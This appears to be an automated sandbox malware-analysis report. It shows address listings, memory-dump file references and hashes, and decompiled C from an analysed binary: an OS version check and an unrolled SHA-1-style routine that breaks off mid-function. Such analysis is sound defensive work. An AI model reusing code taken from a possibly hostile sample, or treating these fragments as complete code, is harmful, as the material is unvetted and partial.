0x0040fb8d
0x0040fb91
0x0040fb95
0x0040fb98
0x0040fb9e
0x0040fb9e
0x0040f1a6
0x0040f1a6
0x0040fb06
0x0040fb06
0x0040fb0d
0x00000000
0x0040fb0f
0x0040fb0f
0x0040fb13
0x0040fb1a
0x0040fb1a
0x0040fb0d
0x0040fb04
0x00000000
0x0040fafd
0x00000000
0x00000000
0x0040fba9
0x0040fbae
0x00000000
0x0040fbb4
0x0040fbb4
0x0040fbb8
0x0040fbbb
0x0040fbbf
0x0040fbc3
0x0040fbc5
0x0040fbc9
0x00000000
0x0040fbc9
0x00000000
0x00000000
0x0040fbd4
0x0040fbd8
0x0040fbd9
0x0040fbdb
0x0040fbdd
0x0040fbdd
0x0040fbdd
0x00000000
0x0040fcac
0x0040fcb0
0x0040fd2c
0x0040fd2c
0x00000000
0x0040fcb2
0x0040fcb2
0x0040fcb6
0x00000000
0x0040fcb8
0x0040fcb8
0x0040fcbb
0x0040fce3
0x0040fce3
0x0040fce6
0x0040fd24
0x0040fd26
0x0040fd26
0x0040fd28
0x00000000
0x0040fce8
0x0040fce8
0x0040fcec
0x0040fcf3
0x00000000
0x0040fcf3
0x0040fcc0
0x0040fcc0
0x0040fcc0
0x0040fcc2
0x00000000
0x00000000
0x0040fcc8
0x0040fccb
0x0040fccd
0x0040fccf
0x0040fcd0
0x0040fcd2
0x0040fcd6
0x0040fcd9
0x0040fcdd
0x0040fcde
0x0040fce1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040fce1
0x00000000
0x0040fcc0
0x0040fcbb
0x0040fcb6
0x00000000
0x00000000
0x0040fd32
0x0040fd32
0x00000000
0x00000000
0x0040fd3f
0x0040ed61
0x0040ed61
0x0040ed65
0x0040ed65
0x0040ed69
0x0040ed69
0x0040ed71
0x0040ed75
0x0040ed7c
0x0040ed83
0x0040ed86
0x0040ed8a
0x0040ed8c
0x0040ed90
0x0040ed93
0x0040ed96
0x0040edba
0x0040edc4
0x0040edc9
0x0040edcc
0x0040edce
0x0040fd67
0x00000000
0x0040edd4
0x0040edd4
0x00000000
0x0040edd4
0x0040ed98
0x0040ed98
0x0040ed9b
0x0040fd6b
0x0040fd6f
0x0040fd72
0x0040fd75
0x0040fd78
0x0040fd7b
0x0040fd7e
0x0040fd82
0x0040fd86
0x0040fdc4
0x0040fdc4
0x0040fd88
0x0040fd88
0x0040fd8a
0x00000000
0x0040fd8c
0x0040fd8f
0x0040fd92
0x0040fd96
0x0040fd97
0x0040fd9a
0x0040fdb0
0x0040fdb5
0x0040fdb9
0x0040fdbc
0x0040fdbf
0x0040fd9c
0x0040fd9c
0x0040fda1
0x0040fda5
0x0040fda8
0x0040fdab
0x0040fdab
0x0040fd9a
0x0040fd8a
0x0040fdc8
0x0040fdca
0x0040fdcd
0x0040fdd8
0x0040fdd8
0x0040fdcf
0x0040fdcf
0x0040fdd2
0x00000000
0x0040fdd4
0x0040fdd4
0x0040fdd4
0x0040fdd2
0x0040fde2
0x0040fdfc
0x0040fe01
0x0040fe04
0x0040fe0a
0x0040fe0a
0x0040fe0f
0x0040fe35
0x00000000
0x00000000
0x00000000
0x0040fe06
0x0040fe06
0x0040fe08
0x0040fe11
0x0040fe11
0x0040fe15
0x0040fe17
0x00000000
0x0040fe1d
0x0040fe29
0x0040fe29
0x00000000
0x00000000
0x00000000
0x0040fe08
0x0040eda1
0x0040eda1
0x0040eda3
0x0040eda6
0x00000000
0x0040edac
0x0040edac
0x0040edaf
0x00000000
0x0040edb1
0x0040edb1
0x0040edb4
0x00000000
0x00000000
0x00000000
0x00000000
0x0040edb4
0x0040edaf
0x0040eda6
0x0040ed9b
0x00000000
0x00000000
0x0040edda
0x0040edda
0x0040eddf
0x0040ede6
0x00000000
0x00000000
0x0040f1aa
0x0040f1aa
0x0040f1ac
0x00000000
0x0040e890
0x0040e87a
0x0040e819
0x00000000

Strings

D0A, xrefs: 0040EEDF

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: D0A
API String ID: 0-1448066043
Opcode ID: f57bfb8e2b38a961d0c52b080ba4d4fa78b77839d7f02fd2cf2f7378c8d107cc
Instruction ID: 3032e7bda0a6bb374980cfe40a7480182f82bc0fd44c0d8c6c0f9fc434d1da9a
Opcode Fuzzy Hash: f57bfb8e2b38a961d0c52b080ba4d4fa78b77839d7f02fd2cf2f7378c8d107cc
Instruction Fuzzy Hash: A3429C716043029FD718CF2AC48471ABBE1FF84304F144A7EE855AB791D379E9A6CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0040559A, Relevance: 3.1, APIs: 2, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040559A() {
				void* _v2;
				struct _OSVERSIONINFOW _v284;
				char _v286;
				intOrPtr _v560;
				intOrPtr _v564;
				char _v568;
				struct _OSVERSIONINFOW _v844;
				void* _t18;
				intOrPtr _t19;
				signed int _t25;
				void* _t26;
				void* _t27;
				void* _t28;
				void* _t29;
				intOrPtr _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t36;
				void* _t37;
				void* _t38;
				void* _t40;
				signed int _t56;
				void* _t63;

				_v844.dwOSVersionInfoSize = 0x114;
				_t40 = 0xc8;
				_t25 = 0;
				_t32 = 0;
				if(GetVersionExW( &_v844) == 0) {
					L39:
					return _t40;
				}
				_t18 = _v844.dwPlatformId - 1;
				if(_t18 == 0) {
					_t19 = _v844.dwMinorVersion;
					if(_t19 == 0) {
						_push(0xa);
						L38:
						_pop(_t40);
						goto L39;
					}
					if(_t19 == 0xa) {
						_push(0x1e);
						goto L38;
					}
					if(_t19 != 0x5a) {
						goto L39;
					}
					_push(0x28);
					goto L38;
				}
				if(_t18 != 1) {
					goto L39;
				}
				_t56 = 0;
				if(E00405553( &_v568) == 0) {
					_v284.dwOSVersionInfoSize = 0x11c;
					if(GetVersionExW( &_v284) == 0) {
						goto L9;
					} else {
						_t25 = _v844.dwMajorVersion;
						_t32 = _v844.dwMinorVersion;
						goto L7;
					}
				} else {
					_t25 = _v564;
					_t32 = _v560;
					_t63 = _v286 - 1;
					L7:
					if(_t63 == 0) {
						_t56 = 1;
					}
					L9:
					_t26 = _t25 - 3;
					if(_t26 == 0) {
						_push(5);
						goto L38;
					}
					_t27 = _t26 - 1;
					if(_t27 == 0) {
						_push(0x14);
						goto L38;
					}
					_t28 = _t27 - 1;
					if(_t28 == 0) {
						_t33 = _t32;
						if(_t33 == 0) {
							_push(0x32);
							goto L38;
						}
						_t34 = _t33 - 1;
						if(_t34 == 0) {
							_push(0x3c);
							goto L38;
						}
						if(_t34 == 1) {
							asm("sbb esi, esi");
							_t40 = ( ~_t56 & 0xfffffffb) + 0x41;
						}
						goto L39;
					}
					_t29 = _t28 - 1;
					if(_t29 == 0) {
						_t36 = _t32;
						if(_t36 == 0) {
							asm("sbb esi, esi");
							_t40 = ( ~_t56 & 0xfffffffb) + 0x4b;
						} else {
							_t37 = _t36 - 1;
							if(_t37 == 0) {
								asm("sbb esi, esi");
								_t40 = ( ~_t56 & 0xfffffffb) + 0x55;
							} else {
								_t38 = _t37 - 1;
								if(_t38 == 0) {
									asm("sbb esi, esi");
									_t40 = ( ~_t56 & 0xfffffffb) + 0x5f;
								} else {
									if(_t38 == 1) {
										asm("sbb esi, esi");
										_t40 = ( ~_t56 & 0xfffffffb) + 0x69;
									}
								}
							}
						}
						goto L39;
					}
					if(_t29 != 4 || _t32 != 0) {
						goto L39;
					} else {
						_push(0x6e);
						goto L38;
					}
				}
			}

0x004055a8
0x004055b1
0x004055b6
0x004055b8
0x004055c2
0x004056f3
0x004056fe
0x004056fe
0x004055cc
0x004055cd
0x004056d5
0x004056db
0x004056ef
0x004056f1
0x004056f1
0x00000000
0x004056f1
0x004056e0
0x004056eb
0x00000000
0x004056eb
0x004056e5
0x00000000
0x00000000
0x004056e7
0x00000000
0x004056e7
0x004055d4
0x00000000
0x00000000
0x004055e1
0x004055ec
0x0040560d
0x00405621
0x00000000
0x00405623
0x00405623
0x00405627
0x00000000
0x0040562b
0x004055ee
0x004055ee
0x004055f5
0x004055fc
0x00405633
0x00405633
0x00405637
0x00405637
0x00405638
0x00405638
0x0040563b
0x004056d1
0x00000000
0x004056d1
0x00405641
0x00405642
0x004056cd
0x00000000
0x004056cd
0x00405648
0x00405649
0x004056ac
0x004056af
0x004056c9
0x00000000
0x004056c9
0x004056b1
0x004056b2
0x004056c5
0x00000000
0x004056c5
0x004056b5
0x004056bb
0x004056c0
0x004056c0
0x00000000
0x004056b5
0x0040564b
0x0040564c
0x00405666
0x00405669
0x004056a2
0x004056a7
0x0040566b
0x0040566b
0x0040566c
0x00405694
0x00405699
0x0040566e
0x0040566e
0x0040566f
0x00405686
0x0040568b
0x00405671
0x00405672
0x00405678
0x0040567d
0x0040567d
0x00405672
0x0040566f
0x0040566c
0x00000000
0x00405669
0x00405651
0x00000000
0x0040565f
0x0040565f
0x00000000
0x0040565f
0x00405651

APIs

GetVersionExW.KERNEL32(?), ref: 004055BA

Part of subcall function 00405553: memset.MSVCRT ref: 00405562
Part of subcall function 00405553: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
Part of subcall function 00405553: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581

GetVersionExW.KERNEL32(?), ref: 00405619

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Version$AddressHandleModuleProcmemset
String ID:
API String ID: 3445250173-0
Opcode ID: ca349debe630e03ede182743978b1f9189fac21bd2c91363668e2a3dcb67b5c8
Instruction ID: 346969f53e1e5ba9765839da7690ba5b2fc2a1c3f22f39825daa73f0edc6c901
Opcode Fuzzy Hash: ca349debe630e03ede182743978b1f9189fac21bd2c91363668e2a3dcb67b5c8
Instruction Fuzzy Hash: 1F310336E04E6583D63085188C54BA36294D7417A0FDA0F37EDDDB72C0D67F8D45AE8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2E7, Relevance: 2.9, APIs: 1, Instructions: 1619
COMMONCrypto

Download Yara Rule

C-Code - Quality: 53%

			E0040B2E7() {
				void* _t659;
				void* _t660;
				signed int _t795;
				signed int _t804;
				signed int* _t809;
				signed int _t814;
				signed int _t819;
				signed int* _t824;
				signed int* _t828;
				signed int* _t832;
				signed int* _t836;
				signed int* _t841;
				signed int* _t845;
				signed int* _t849;
				signed int* _t853;
				signed int* _t858;
				signed int* _t862;
				signed int* _t866;
				signed int _t873;
				signed int _t881;
				signed int* _t885;
				signed int _t889;
				signed int _t894;
				signed int _t899;
				signed int _t903;
				signed int _t907;
				signed int _t911;
				signed int _t915;
				signed int _t919;
				signed int _t923;
				signed int _t927;
				signed int _t931;
				signed int _t935;
				signed int _t939;
				signed int _t943;
				signed int _t947;
				signed int _t953;
				signed int _t957;
				signed int _t961;
				signed int _t964;
				signed int _t966;
				signed int* _t969;
				signed int* _t972;
				signed int _t978;
				signed int _t984;
				signed int _t990;
				signed int _t996;
				signed int* _t997;
				signed int* _t1003;
				signed int* _t1009;
				signed int _t1018;
				signed int _t1025;
				signed int* _t1026;
				signed int _t1032;
				signed int _t1038;
				signed int* _t1044;
				signed int* _t1050;
				signed int* _t1056;
				signed int* _t1062;
				signed int* _t1068;
				signed int* _t1074;
				signed int* _t1080;
				signed int _t1089;
				void* _t1094;
				signed int _t1097;
				signed int _t1099;
				signed int _t1100;
				signed int _t1103;
				signed int _t1106;
				signed int _t1107;
				signed int _t1109;
				signed int _t1111;
				signed int _t1113;
				signed int* _t1115;
				signed int _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int _t1120;
				signed int _t1121;
				signed int _t1123;
				signed int _t1125;
				signed int _t1126;
				signed int _t1127;
				signed int _t1132;
				signed int _t1134;
				signed int _t1197;
				signed int* _t1225;
				signed int* _t1229;
				signed int* _t1235;
				signed int* _t1238;
				void* _t1243;
				signed int _t1246;
				void* _t1249;
				signed int _t1252;
				void* _t1255;
				signed int _t1258;
				void* _t1261;
				signed int _t1264;
				void* _t1267;
				signed int _t1270;
				void* _t1273;
				signed int* _t1274;
				signed int* _t1277;
				signed int _t1281;
				void* _t1284;
				signed int _t1286;
				signed int* _t1289;
				signed int* _t1296;
				signed int* _t1303;
				signed int* _t1310;
				signed int* _t1317;
				signed int* _t1324;
				signed int* _t1331;
				signed int* _t1338;
				signed int* _t1345;
				signed int* _t1352;
				signed int* _t1359;
				signed int _t1369;
				signed int* _t1376;
				signed int* _t1380;
				signed int _t1387;
				signed int _t1394;
				signed int* _t1401;
				signed int* _t1408;
				signed int* _t1428;
				signed int* _t1430;
				signed int* _t1432;
				signed int* _t1435;
				void* _t1438;
				signed int _t1439;
				signed int* _t1440;
				signed int _t1445;
				signed int* _t1448;
				signed int* _t1458;
				intOrPtr* _t1461;
				signed int* _t1462;
				signed int _t1465;
				signed int _t1466;
				signed int _t1470;
				signed int _t1473;
				signed int _t1477;
				signed int _t1481;
				signed int _t1485;
				signed int _t1488;
				signed int _t1492;
				signed int _t1497;
				signed int _t1502;
				signed int _t1506;
				signed int _t1510;
				signed int _t1514;
				signed int _t1518;
				signed int _t1522;
				signed int _t1526;
				signed int _t1530;
				signed int _t1534;
				signed int _t1538;
				signed int _t1542;
				signed int _t1546;
				void* _t1549;
				signed int _t1553;
				signed int _t1557;
				signed int _t1561;
				signed int* _t1573;
				signed int* _t1577;
				signed int* _t1579;
				signed int _t1588;
				signed int _t1592;
				signed int _t1596;
				signed int _t1600;
				signed int* _t1602;
				signed int _t1606;
				signed int _t1610;
				signed int _t1614;
				signed int _t1616;
				signed int _t1620;
				signed int _t1624;
				signed int _t1628;
				signed int _t1632;
				signed int _t1637;
				signed int _t1642;
				signed int _t1646;
				signed int _t1650;
				signed int _t1654;
				signed int _t1658;
				void* _t1660;
				signed int _t1662;
				signed int _t1664;
				signed int _t1665;
				signed int _t1669;
				signed int _t1672;
				signed int _t1675;
				signed int _t1678;
				signed int _t1679;
				signed int _t1681;
				signed int _t1683;
				signed int _t1685;
				signed int* _t1687;
				signed int _t1688;
				signed int _t1689;
				signed int _t1690;
				signed int _t1691;
				signed int _t1692;
				signed int _t1693;
				signed int _t1695;
				signed int _t1697;
				signed int _t1699;
				signed int* _t1700;
				signed int _t1702;
				signed int _t1704;
				signed int _t1707;
				signed int _t1709;
				signed int _t1710;
				signed int _t1712;
				signed int _t1715;
				signed int _t1716;
				signed int _t1718;
				signed int _t1720;
				signed int _t1722;
				signed int _t1724;
				signed int _t1729;
				signed int _t1733;
				signed int _t1737;
				signed int _t1741;
				signed int _t1745;
				signed int _t1749;
				signed int _t1753;
				signed int _t1757;
				signed int _t1761;
				signed int _t1765;
				signed int _t1769;
				signed int _t1773;
				signed int _t1777;
				signed int _t1781;
				signed int _t1785;
				signed int _t1789;
				signed int _t1793;
				signed int _t1797;
				signed int _t1801;
				signed int _t1803;
				signed int _t1804;
				signed int _t1805;
				signed int _t1808;
				signed int _t1810;
				signed int _t1813;
				signed int _t1815;
				signed int _t1816;
				signed int _t1819;
				signed int _t1822;
				signed int _t1823;
				signed int _t1824;
				signed int _t1825;
				signed int _t1827;
				signed int _t1828;
				signed int _t1829;
				signed int _t1830;
				signed int _t1831;
				signed int _t1833;
				signed int _t1835;
				signed int _t1838;
				signed int _t1840;
				signed int _t1842;
				signed int _t1844;
				signed int _t1846;
				void* _t1849;

				_t659 =  *(_t1849 + 0xc);
				if(_t659 == 0) {
					_t660 =  *(_t1849 + 0x54);
					 *(_t1849 + 0x58) = _t660;
				} else {
					memcpy(_t659,  *(_t1849 + 0x58), 0x40);
					_t660 =  *(_t1849 + 0x64);
					_t1849 = _t1849 + 0xc;
				}
				_t1462 =  *(_t1849 + 0x50);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x3c) =  *_t660 & 0xff00ff00 |  *_t660 & 0x00ff00ff;
				_t1097 = _t1462[1];
				_t1813 =  *_t1462;
				asm("rol ecx, 0x5");
				_t1707 = _t1462[3];
				_t1662 = _t1462[2];
				asm("ror ebx, 0x2");
				_t1465 = _t1462[4] + 0x5a827999 + ((_t1707 ^ _t1662) & _t1097 ^ _t1707) + _t1813 +  *(_t1849 + 0x44);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x50) = ( *(_t1849 + 0x68))[1] & 0xff00ff00 | ( *(_t1849 + 0x68))[1] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				_t1709 = _t1707 + 0x5a827999 + ((_t1662 ^ _t1097) & _t1813 ^ _t1662) + _t1465 +  *(_t1849 + 0x50);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x38) = ( *(_t1849 + 0x68))[2] & 0xff00ff00 | ( *(_t1849 + 0x68))[2] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror edx, 0x2");
				_t1664 = _t1662 + 0x5a827999 + ((_t1097 ^ _t1813) & _t1465 ^ _t1097) + _t1709 +  *(_t1849 + 0x38);
				asm("ror ecx, 0x8");
				asm("rol eax, 0x8");
				 *(_t1849 + 0x14) = ( *(_t1849 + 0x68))[3] & 0xff00ff00 | ( *(_t1849 + 0x68))[3] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror esi, 0x2");
				_t1099 = _t1097 + 0x5a827999 + ((_t1465 ^ _t1813) & _t1709 ^ _t1813) + _t1664 +  *(_t1849 + 0x14);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x10) = ( *(_t1849 + 0x68))[4] & 0xff00ff00 | ( *(_t1849 + 0x68))[4] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror edi, 0x2");
				_t1815 = _t1813 + 0x5a827999 + ((_t1465 ^ _t1709) & _t1664 ^ _t1465) + _t1099 +  *(_t1849 + 0x10);
				asm("ror ecx, 0x8");
				asm("rol eax, 0x8");
				 *(_t1849 + 0x3c) = ( *(_t1849 + 0x68))[5] & 0xff00ff00 | ( *(_t1849 + 0x68))[5] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t1466 = _t1465 + ((_t1709 ^ _t1664) & _t1099 ^ _t1709) + _t1815 + 0x5a827999 +  *(_t1849 + 0x3c);
				asm("ror ecx, 0x8");
				asm("rol eax, 0x8");
				 *(_t1849 + 0x40) = ( *(_t1849 + 0x68))[6] & 0xff00ff00 | ( *(_t1849 + 0x68))[6] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				_t1710 = _t1709 + ((_t1664 ^ _t1099) & _t1815 ^ _t1664) + _t1466 + 0x5a827999 +  *(_t1849 + 0x40);
				asm("ror ecx, 0x8");
				asm("rol eax, 0x8");
				 *(_t1849 + 0x44) = ( *(_t1849 + 0x68))[7] & 0xff00ff00 | ( *(_t1849 + 0x68))[7] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror edx, 0x2");
				_t1665 = _t1664 + ((_t1099 ^ _t1815) & _t1466 ^ _t1099) + _t1710 + 0x5a827999 +  *(_t1849 + 0x44);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x1c) = ( *(_t1849 + 0x68))[8] & 0xff00ff00 | ( *(_t1849 + 0x68))[8] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror esi, 0x2");
				_t1100 = _t1099 + ((_t1466 ^ _t1815) & _t1710 ^ _t1815) + _t1665 + 0x5a827999 +  *(_t1849 + 0x1c);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x18) = ( *(_t1849 + 0x68))[9] & 0xff00ff00 | ( *(_t1849 + 0x68))[9] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror edi, 0x2");
				_t1816 = _t1815 + ((_t1466 ^ _t1710) & _t1665 ^ _t1466) + _t1100 + 0x5a827999 +  *(_t1849 + 0x18);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x20) = ( *(_t1849 + 0x68))[0xa] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xa] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t1197 = _t1816 +  *(_t1849 + 0x20) + ((_t1710 ^ _t1665) & _t1100 ^ _t1710) + _t1466 + 0x5a827999;
				 *(_t1849 + 0x34) = _t1197;
				asm("rol ecx, 0x5");
				 *(_t1849 + 0x30) = _t1100;
				asm("ror edx, 0x8");
				asm("rol eax, 0x8");
				_t1470 = ( *(_t1849 + 0x68))[0xb] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xb] & 0x00ff00ff;
				 *(_t1849 + 0x48) = _t1470;
				asm("ror ebp, 0x2");
				 *(_t1849 + 0x54) = _t1816;
				_t1473 = _t1470 + _t1197 + ((_t1665 ^ _t1100) & _t1816 ^ _t1665) + _t1710 + 0x5a827999;
				_t1712 =  *(_t1849 + 0x34);
				asm("rol eax, 0x8");
				asm("ror ecx, 0x8");
				 *(_t1849 + 0x24) = ( *(_t1849 + 0x68))[0xc] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xc] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				_t1103 = (_t1100 ^ (_t1100 ^ _t1816) & _t1712) + _t1473 +  *(_t1849 + 0x24) + _t1665 + 0x5a827999;
				asm("ror esi, 0x2");
				 *(_t1849 + 0x34) = _t1712;
				asm("rol ecx, 0x5");
				asm("rol eax, 0x8");
				asm("ror edi, 0x8");
				_t1669 = ( *(_t1849 + 0x68))[0xd] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xd] & 0x00ff00ff;
				 *(_t1849 + 0x28) = _t1669;
				asm("ror edx, 0x2");
				 *(_t1849 + 0x58) = _t1473;
				_t1819 = (_t1816 ^ (_t1712 ^ _t1816) & _t1473) + _t1103 + _t1669 +  *(_t1849 + 0x30) + 0x5a827999;
				asm("rol ecx, 0x5");
				asm("rol eax, 0x8");
				asm("ror edi, 0x8");
				_t1672 = ( *(_t1849 + 0x68))[0xe] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xe] & 0x00ff00ff;
				 *(_t1849 + 0x2c) = _t1672;
				asm("ror ebx, 0x2");
				 *(_t1849 + 0x54) = _t1103;
				_t1715 = (_t1712 ^ (_t1712 ^ _t1473) & _t1103) + _t1819 + _t1672 +  *(_t1849 + 0x54) + 0x5a827999;
				asm("ror edi, 0x8");
				asm("rol eax, 0x8");
				_t1675 = ( *(_t1849 + 0x68))[0xf] & 0xff00ff00 | ( *(_t1849 + 0x68))[0xf] & 0x00ff00ff;
				asm("rol ecx, 0x5");
				 *(_t1849 + 0x30) = _t1675;
				_t1678 = _t1675 + _t1715 + ((_t1473 ^ _t1103) & _t1819 ^ _t1473) +  *(_t1849 + 0x34) + 0x5a827999;
				_t1477 =  *(_t1849 + 0x38) ^  *(_t1849 + 0x4c) ^  *(_t1849 + 0x28) ^  *(_t1849 + 0x1c);
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				 *( *(_t1849 + 0x68)) = _t1477;
				_t1481 =  *(_t1849 + 0x14) ^  *(_t1849 + 0x50) ^  *(_t1849 + 0x2c) ^  *(_t1849 + 0x18);
				_t1106 = (_t1103 ^ (_t1103 ^ _t1819) & _t1715) + _t1678 + _t1477 +  *(_t1849 + 0x58) + 0x5a827999;
				asm("rol edx, 1");
				asm("ror esi, 0x2");
				asm("rol ecx, 0x5");
				( *(_t1849 + 0x68))[1] = _t1481;
				_t1485 =  *(_t1849 + 0x10) ^  *(_t1849 + 0x38) ^  *(_t1849 + 0x30) ^  *(_t1849 + 0x20);
				 *(_t1849 + 0x34) = _t1819;
				asm("rol edx, 1");
				_t1822 = (_t1819 ^ (_t1819 ^ _t1715) & _t1678) + _t1106 + _t1481 +  *(_t1849 + 0x54) + 0x5a827999;
				asm("ror edi, 0x2");
				( *(_t1849 + 0x68))[2] = _t1485;
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t1488 = _t1485 + _t1822 + ((_t1678 ^ _t1715) & _t1106 ^ _t1715) +  *(_t1849 + 0x34) + 0x5a827999;
				_t1225 =  *(_t1849 + 0x68);
				_t795 =  *(_t1849 + 0x14) ^  *_t1225 ^  *(_t1849 + 0x48) ^  *(_t1849 + 0x3c);
				asm("rol eax, 1");
				_t1225[3] = _t795;
				 *(_t1849 + 0x14) = _t795;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				_t1229 =  *(_t1849 + 0x68);
				_t1716 = _t1715 + ((_t1678 ^ _t1106) & _t1822 ^ _t1678) + _t1488 + 0x5a827999 +  *(_t1849 + 0x14);
				_t804 =  *(_t1849 + 0x10) ^ _t1229[1] ^  *(_t1849 + 0x24) ^  *(_t1849 + 0x40);
				asm("rol eax, 1");
				_t1229[4] = _t804;
				 *(_t1849 + 0x10) = _t804;
				asm("rol ecx, 0x5");
				asm("ror edx, 0x2");
				_t1679 = _t1678 + (_t1106 ^ _t1822 ^ _t1488) + _t1716 + 0x6ed9eba1 +  *(_t1849 + 0x10);
				 *(_t1849 + 0x38) = _t1488;
				_t809 =  *(_t1849 + 0x68);
				asm("rol ecx, 0x5");
				_t1492 = _t809[2] ^  *(_t1849 + 0x28) ^  *(_t1849 + 0x44) ^  *(_t1849 + 0x3c);
				asm("rol edx, 1");
				_t809[5] = _t1492;
				asm("ror esi, 0x2");
				_t1235 =  *(_t1849 + 0x68);
				_t1107 = _t1106 + (_t1822 ^  *(_t1849 + 0x38) ^ _t1716) + _t1679 + _t1492 + 0x6ed9eba1;
				_t814 = _t1235[3];
				_t1497 = _t814 ^  *(_t1849 + 0x2c) ^  *(_t1849 + 0x1c) ^  *(_t1849 + 0x40);
				asm("rol edx, 1");
				_t1235[6] = _t1497;
				 *(_t1849 + 0x14) = _t814;
				asm("rol ecx, 0x5");
				asm("ror edi, 0x2");
				_t1238 =  *(_t1849 + 0x68);
				_t1823 = _t1822 + (_t1679 ^  *(_t1849 + 0x38) ^ _t1716) + _t1107 + _t1497 + 0x6ed9eba1;
				_t819 = _t1238[4];
				_t1502 = _t819 ^  *(_t1849 + 0x30) ^  *(_t1849 + 0x18) ^  *(_t1849 + 0x44);
				asm("rol edx, 1");
				 *(_t1849 + 0x10) = _t819;
				_t1238[7] = _t1502;
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t1243 =  *(_t1849 + 0x38) + 0x6ed9eba1 + (_t1679 ^ _t1107 ^ _t1716) + _t1823 + _t1502;
				_t824 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x58) = _t1243;
				asm("rol ecx, 0x5");
				_t1506 =  *_t824 ^  *(_t1849 + 0x20) ^  *(_t1849 + 0x1c) ^ _t824[5];
				asm("rol edx, 1");
				_t824[8] = _t1506;
				asm("ror ebp, 0x2");
				_t828 =  *(_t1849 + 0x68);
				_t1246 = _t1243 + _t1506 + (_t1679 ^ _t1107 ^ _t1823) + _t1716 + 0x6ed9eba1;
				_t1718 =  *(_t1849 + 0x58);
				 *(_t1849 + 0x54) = _t1246;
				asm("rol ecx, 0x5");
				_t1510 = _t828[1] ^  *(_t1849 + 0x48) ^  *(_t1849 + 0x18) ^ _t828[6];
				asm("rol edx, 1");
				_t828[9] = _t1510;
				asm("ror esi, 0x2");
				_t832 =  *(_t1849 + 0x68);
				_t1249 = _t1246 + _t1510 + (_t1107 ^ _t1823 ^ _t1718) + _t1679 + 0x6ed9eba1;
				_t1681 =  *(_t1849 + 0x54);
				 *(_t1849 + 0x58) = _t1249;
				asm("rol ecx, 0x5");
				_t1514 = _t832[2] ^  *(_t1849 + 0x24) ^  *(_t1849 + 0x20) ^ _t832[7];
				asm("rol edx, 1");
				_t832[0xa] = _t1514;
				asm("ror edi, 0x2");
				_t836 =  *(_t1849 + 0x68);
				_t1252 = _t1249 + _t1514 + (_t1823 ^ _t1718 ^ _t1681) + _t1107 + 0x6ed9eba1;
				_t1109 =  *(_t1849 + 0x58);
				 *(_t1849 + 0x54) = _t1252;
				asm("rol ecx, 0x5");
				_t1518 =  *(_t1849 + 0x14) ^  *(_t1849 + 0x28) ^  *(_t1849 + 0x48) ^ _t836[8];
				asm("rol edx, 1");
				_t836[0xb] = _t1518;
				asm("ror ebx, 0x2");
				_t172 = _t1823 + 0x6ed9eba1; // 0x14577208
				_t1255 = _t172 + (_t1109 ^ _t1718 ^ _t1681) + _t1252 + _t1518;
				_t841 =  *(_t1849 + 0x68);
				 *(_t1849 + 0x58) = _t1255;
				_t1522 =  *(_t1849 + 0x10) ^  *(_t1849 + 0x2c) ^  *(_t1849 + 0x24) ^ _t841[9];
				_t1824 =  *(_t1849 + 0x54);
				asm("rol edx, 1");
				_t841[0xc] = _t1522;
				asm("rol ecx, 0x5");
				asm("ror ebp, 0x2");
				_t845 =  *(_t1849 + 0x68);
